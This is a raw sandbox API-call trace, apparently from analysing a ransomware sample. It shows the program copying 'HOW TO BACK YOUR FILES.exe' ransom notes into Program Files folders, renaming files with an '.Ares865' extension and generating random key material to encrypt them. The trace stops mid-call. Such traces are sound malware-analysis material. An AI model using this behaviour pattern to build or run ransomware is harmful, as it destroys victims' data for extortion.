FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1042\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x5382b7a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5382b7a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0057.050] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0057.050] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0057.050] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1041", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1041") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1041" [0057.050] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0270 | out: hHeap=0x2b0000) returned 1 [0057.050] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ca8 | out: hHeap=0x2b0000) returned 1 [0057.050] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1041") returned 62 [0057.051] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1041" | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1041") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1041" [0057.051] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0057.051] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1041\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\1041\\how to back your files.exe"), bFailIfExists=1) returned 1 [0057.055] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0057.055] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1041\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed84810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x5382b7a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5382b7a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0057.056] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0057.056] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0057.056] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1040", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1040") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1040" [0057.056] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f02f8 | out: hHeap=0x2b0000) returned 1 [0057.056] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b88 | out: hHeap=0x2b0000) returned 1 [0057.056] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1040") returned 62 [0057.056] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1040" | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1040") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1040" [0057.056] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0057.056] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1040\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\1040\\how to back your files.exe"), bFailIfExists=1) returned 1 [0057.061] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0057.061] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1040\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed84810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x5382b7a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5382b7a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0057.061] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0057.061] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0057.062] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1036", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1036") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1036" [0057.062] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0057.062] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b68 | out: hHeap=0x2b0000) returned 1 [0057.062] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1036") returned 62 [0057.062] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1036" | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1036") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1036" [0057.062] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0057.062] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1036\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\1036\\how to back your files.exe"), bFailIfExists=1) returned 1 [0057.077] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0057.077] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1036\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed84810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x53851900, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53851900, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0057.077] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0057.077] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0057.078] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1033", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1033") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1033" [0057.078] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0057.078] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b48 | out: hHeap=0x2b0000) returned 1 [0057.078] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1033") returned 62 [0057.078] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1033" | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1033") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1033" [0057.078] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0057.078] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1033\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\1033\\how to back your files.exe"), bFailIfExists=1) returned 1 [0057.085] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0057.085] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1033\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed84810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x53877a60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53877a60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0057.085] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0057.085] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0057.085] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1031", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1031") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1031" [0057.085] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2effc8 | out: hHeap=0x2b0000) returned 1 [0057.085] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b28 | out: hHeap=0x2b0000) returned 1 [0057.085] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1031") returned 62 [0057.085] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1031" | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1031") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1031" [0057.085] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0057.085] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1031\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\1031\\how to back your files.exe"), bFailIfExists=1) returned 1 [0057.091] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0057.091] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1031\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed5e6b0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x53877a60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53877a60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0057.091] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0057.091] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0057.091] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1028", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1028") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1028" [0057.091] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0057.091] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b08 | out: hHeap=0x2b0000) returned 1 [0057.091] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1028") returned 62 [0057.091] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1028" | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1028") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1028" [0057.091] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0057.091] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1028\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\1028\\how to back your files.exe"), bFailIfExists=1) returned 1 [0057.096] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0057.096] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1028\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed5e6b0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x5389dbc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5389dbc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0057.096] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0057.096] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0057.096] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\DAO", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\DAO") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\DAO" [0057.096] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c1608 | out: hHeap=0x2b0000) returned 1 [0057.096] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ae8 | out: hHeap=0x2b0000) returned 1 [0057.096] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\microsoft shared\\DAO") returned 56 [0057.096] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\DAO" | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\DAO") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\DAO" [0057.096] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0057.097] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\DAO\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\dao\\how to back your files.exe"), bFailIfExists=1) returned 1 [0057.101] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0057.101] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\DAO\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8d1336, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x5389dbc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5389dbc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0057.102] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0057.102] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0057.102] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Common Files\\Java", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\Java") returned="C:\\Program Files (x86)\\Common Files\\Java" [0057.102] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2df770 | out: hHeap=0x2b0000) returned 1 [0057.102] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ac8 | out: hHeap=0x2b0000) returned 1 [0057.102] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\Java") returned 40 [0057.102] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\Java" | out: lpString1="C:\\Program Files (x86)\\Common Files\\Java") returned="C:\\Program Files (x86)\\Common Files\\Java" [0057.102] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0057.102] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Java\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\java\\how to back your files.exe"), bFailIfExists=1) returned 1 [0057.107] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0057.107] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Java\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x801ae160, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x5389dbc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5389dbc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0057.107] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0057.107] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0057.107] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Common Files\\Java\\Java Update", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\Java\\Java Update") returned="C:\\Program Files (x86)\\Common Files\\Java\\Java Update" [0057.107] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cc5b0 | out: hHeap=0x2b0000) returned 1 [0057.107] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ac8 | out: hHeap=0x2b0000) returned 1 [0057.107] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\Java\\Java Update") returned 52 [0057.107] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\Java\\Java Update" | out: lpString1="C:\\Program Files (x86)\\Common Files\\Java\\Java Update") returned="C:\\Program Files (x86)\\Common Files\\Java\\Java Update" [0057.107] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0057.107] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\java\\java update\\how to back your files.exe"), bFailIfExists=1) returned 1 [0057.113] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0057.113] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x801d42c0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x538c3d20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x538c3d20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0057.113] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0057.113] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0057.113] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\task.xml.Ares865") returned 69 [0057.113] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\task.xml" (normalized: "c:\\program files (x86)\\common files\\java\\java update\\task.xml"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\task.xml.Ares865" (normalized: "c:\\program files (x86)\\common files\\java\\java update\\task.xml.ares865"), dwFlags=0x1) returned 1 [0057.114] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\task.xml.Ares865" (normalized: "c:\\program files (x86)\\common files\\java\\java update\\task.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0057.114] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=1411) returned 1 [0057.114] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0057.114] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2cc5b0 [0057.114] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0057.114] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2effc8) returned 1 [0057.115] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0057.115] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0057.115] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x890, lpName=0x0) returned 0x15c [0057.122] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x890) returned 0x190000 [0057.123] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2effc8) returned 1 [0057.124] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0057.124] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0057.124] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d1ea0 [0057.124] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1ea0 | out: hHeap=0x2b0000) returned 1 [0057.124] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0057.124] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0057.124] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0057.124] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0057.124] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d5ee0 [0057.124] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0057.124] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d5ee0 | out: hHeap=0x2b0000) returned 1 [0057.124] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0057.124] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0057.125] CloseHandle (hObject=0x15c) returned 1 [0057.125] CloseHandle (hObject=0x118) returned 1 [0057.126] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cc5b0 | out: hHeap=0x2b0000) returned 1 [0057.126] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0057.126] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0057.126] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfeb63a00, ftCreationTime.dwHighDateTime=0x1ce76b0, ftLastAccessTime.dwLowDateTime=0x80220580, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0xfeb63a00, ftLastWriteTime.dwHighDateTime=0x1ce76b0, nFileSizeHigh=0x0, nFileSizeLow=0x588, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="task64.xml", cAlternateFileName="")) returned 1 [0057.126] lstrcmpiW (lpString1="task64.xml", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0057.126] lstrcmpiW (lpString1="task64.xml", lpString2="aoldtz.exe") returned 1 [0057.126] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\task64.xml.Ares865") returned 71 [0057.126] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\task64.xml" (normalized: "c:\\program files (x86)\\common files\\java\\java update\\task64.xml"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\task64.xml.Ares865" (normalized: "c:\\program files (x86)\\common files\\java\\java update\\task64.xml.ares865"), dwFlags=0x1) returned 1 [0057.127] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\task64.xml.Ares865" (normalized: "c:\\program files (x86)\\common files\\java\\java update\\task64.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0057.127] GetFileSizeEx (in: hFile=0x118, 